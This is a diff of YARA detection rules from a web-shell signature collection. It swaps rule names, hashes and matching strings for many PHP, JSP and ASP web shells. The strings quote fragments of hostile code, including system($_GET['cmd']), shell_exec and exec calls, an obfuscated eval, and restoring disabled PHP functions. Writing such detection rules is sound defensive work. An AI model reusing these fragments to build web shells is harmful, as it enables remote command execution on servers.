-		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
-		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
+		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
+		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
+		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
+		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Phpjackal_V1_5
+rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_Nstview_Xxx
 {
 	meta:
-		description = "Web Shell - file PHPJackal v1.5.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1558-L1572"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2988-L3007"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d76dc20a4017191216a0315b7286056f"
-		logic_hash = "457bc71cb8e684dafb14b1c5d2faa4366cedce5eba9545493be2b1d49daf98b6"
+		logic_hash = "b10e89c6b1851f88a2bbb9116969ea3770366c162b911cb8a2c3a033da3a46bc"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "4745d510fed4378e4b1730f56f25e569"
+		hash2 = "f3ca29b7999643507081caab926e2e74"
+		hash3 = "46a18979750fa458a04343cf58faa9bd"
 
 	strings:
-		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
-		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
+		$s3 = "BODY, TD, TR {" fullword
+		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
+		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Customize
+rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Xxx
 {
 	meta:
-		description = "Web Shell - file customize.jsp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1573-L1586"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3008-L3058"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d55578eccad090f30f5d735b8ec530b1"
-		logic_hash = "462d97427793ef6e897b33f4fd02d452ad8cd11ddef21aa25d13efc981eb3afb"
+		logic_hash = "46eede3a1af29e344ed5107fc0af4bd13cd1492bff340d61063911bbb474e7b3"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "6acc82544be056580c3a1caaa4999956"
+		hash23 = "6aa32a6392840e161a018f3907a86968"
+		hash24 = "591ca89a25f06cf01e4345f98a22845c"
+		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash26 = "3ea688e3439a1f56b16694667938316d"
+		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash28 = "71097537a91fac6b01f46f66ee2d7749"
+		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
+		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
+		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
+		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
+		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
+		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
+		$s9 = "sis = request.getInputStream();" fullword
 
 	condition:
-		all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Webshell_S72_Shell_V1_1_Coding
+rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1
 {
 	meta:
-		description = "Web Shell - file s72 Shell v1.1 Coding.php"
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1587-L1600"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3059-L3079"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c2e8346a5515c81797af36e7e4a3828e"
-		logic_hash = "fd200d8aa347242546a1da311edc61ceebaec5f7d6b4fe2f49f069b36689f547"
+		logic_hash = "795eb586310d87a3c6b53117bf2c8cbcfadcb177f5a5129c17fd21f0b64c385c"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
 
 	strings:
-		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
+		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
+		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
+		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Sys3
+rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Jsp_Suiyue_Warn
 {
 	meta:
-		description = "Web Shell - file sys3.jsp"
+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1601-L1616"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3080-L3104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
-		logic_hash = "14b0ac1b1b8538b0c05dcd0a8b7129fdcad2e595ea00630bd55cee6dff596d4f"
+		logic_hash = "5e0da29499d76539fb1f5cfbe0a00331eeb0bb8fa861f2e2d686130ee4939fac"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash7 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
-		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
-		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
+		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
+		$s2 = " KB </td>" fullword
+		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
+		$s4 = "<!-- <tr align=\"center\"> " fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Guige02
+rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_PHPSPY
 {
 	meta:
-		description = "Web Shell - file guige02.jsp"
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1617-L1631"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3106-L3126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a3b8b2280c56eaab777d633535baf21d"
-		logic_hash = "c214e50b209970c03d389d97673901ec44b2727e5c7588e5e4d0a644cc691423"
+		logic_hash = "fc47a50c5964574fb9b9caf3fb94041f028998577bf4ccf21884a41fa1876572"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "40a1f840111996ff7200d18968e42cfe"
+		hash3 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
-		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
+		$s4 = "http://www.4ngel.net" fullword
+		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
+		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
+		$s9 = "Codz by Angel" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Ghost
+rule SIGNATURE_BASE_Webshell_C99_Locus7S_C99_W4Cking_Xxx
 {
 	meta:
-		description = "Web Shell - file ghost.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1632-L1647"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3127-L3156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "38dc8383da0859dca82cf0c943dbf16d"
-		logic_hash = "9a7635d313345e7b7cb7424726ed62015afd78412b504e406155f85c4cdf623f"
+		logic_hash = "4afadac41e729f77711eb3ea3ee8f6e8ce61e19294e90db024e5334e214d9647"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		hash1 = "9c34adbc8fd8d908cbb341734830f971"
+		hash2 = "ef43fef943e9df90ddb6257950b3538f"
+		hash3 = "ae025c886fbe7f9ed159f49593674832"
+		hash4 = "911195a9b7c010f61b66439d9048f400"
+		hash5 = "697dae78c040150daff7db751fc0c03c"
+		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
+		hash12 = "41af6fd253648885c7ad2ed524e0692d"
+		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
-		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
-		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
+		$s1 = "$res = @shell_exec($cfe);" fullword
+		$s8 = "$res = @ob_get_contents();" fullword
+		$s9 = "@exec($cfe,$res);" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Winx_Shell
+rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Ma2_Download
 {
 	meta:
-		description = "Web Shell - file WinX Shell.php"
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1648-L1662"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3157-L3178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "17ab5086aef89d4951fe9b7c7a561dda"
-		logic_hash = "e6dd5178cafccca751dd3f2e36206acd214a65b2e0783a738a104b3dc680ca21"
+		logic_hash = "3b8bb6ca2eb146f8c170d629612ba12d4663445d443b681f2859af25d50ab6fe"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
+		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
-		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
+		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
+		$s2 = "private static String tempdir = \".\";" fullword
+		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Crystal_Crystal
+rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010
 {
 	meta:
-		description = "Web Shell - file Crystal.php"
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1663-L1677"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3179-L3200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
-		logic_hash = "735332a2ec7df65cca4ca69e702c5893d302a01c7ee7b84d01a1e6ab9646de93"
+		logic_hash = "dd01bb059d741fedaee17d46355c7cd8a845d714b20ae37db36424544b954d2f"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
 
 	strings:
-		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
-		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
+		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
+		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
+		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
+		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_R57_1_4_0
+rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Kartal_R57
 {
 	meta:
-		description = "Web Shell - file r57.1.4.0.php"
+		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1678-L1694"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3201-L3219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "574f3303e131242568b0caf3de42f325"
-		logic_hash = "cb48621c572d529b8dc634e7b6360257ad4fce9664bfca7ee7c0101be42d2c24"
+		logic_hash = "fd849f76f8348ee57a9c96eed91c8cac416fdc45a08c93e93ebc952375de27a3"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
 
 	strings:
-		$s4 = "@ini_set('error_log',NULL);" fullword
-		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
-		$s7 = "@ini_restore(\"disable_functions\");" fullword
-		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
+		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
+		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
+		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ajn
+rule SIGNATURE_BASE_Webshell_Webshells_New_Con2
 {
 	meta:
-		description = "Web Shell - file ajn.asp"
+		description = "Web shells - generated from file con2.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1696-L1710"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3221-L3235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aaafafc5d286f0bff827a931f6378d04"
-		logic_hash = "0a6c9a210c0337d6b984bcf6cd7f14103a0f6f5d38a26c789519c2b1629aaede"
+		hash = "d3584159ab299d546bd77c9654932ae3"
+		logic_hash = "c681b04a1ee4d6af3275b6d772ef35f8bc888a5fcaf3b84f29f77c264e8ad9b9"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
-		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
+		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
+		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Cmd
+rule SIGNATURE_BASE_Webshell_Webshells_New_Make2
 {
 	meta:
-		description = "Web Shell - file cmd.php"
+		description = "Web shells - generated from file make2.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1711-L1726"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3236-L3249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
-		logic_hash = "d9a0802f6fd7047ba5477f6bba61c4ac02cabfce06270fdbd8e8e68a693ccf68"
-		score = 70
+		hash = "9af195491101e0816a263c106e4c145e"
+		logic_hash = "7c94c925b5fd7fbc37428c21a9ea3c5a73f4fa0a20a1f5d03f0d5a990bd6f45a"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if($_GET['cmd']) {" fullword
-		$s1 = "// cmd.php = Command Execution" fullword
-		$s7 = "  system($_GET['cmd']);" fullword
+		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_List
+rule SIGNATURE_BASE_Webshell_Webshells_New_Aaa
 {
 	meta:
-		description = "Web Shell - file list.asp"
+		description = "Web shells - generated from file aaa.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1727-L1741"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3250-L3265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
-		logic_hash = "9c8bdeb5992015b26fbee418ed6e6b7c6b0901f26bddf9dc26706c0b63ea9c95"
+		hash = "68483788ab171a155db5266310c852b2"
+		logic_hash = "3c5b9dd86dc790b03a8540b2fb3a717c5ad17d34f366a319faa127479387eed9"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
-		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
+		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
+		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
+		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Co
+rule SIGNATURE_BASE_Webshell_Expdoor_Com_ASP
 {
 	meta:
-		description = "Web Shell - file co.php"
+		description = "Web shells - generated from file Expdoor.com ASP.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1742-L1756"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3266-L3283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "62199f5ac721a0cb9b28f465a513874c"
-		logic_hash = "3fab3e97d10b6c56fb7df8bcd520bda318fc127a620c5aafba09cb36ffd6a8df"
+		hash = "caef01bb8906d909f24d1fa109ea18a7"
+		logic_hash = "838edb9d718b5e1a8be155c4569b4a291b37337e71b435c2b1cd6bcaa53c0dea"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
-		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
+		$s4 = "\">www.Expdoor.com</a>" fullword
+		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
+		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
+		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
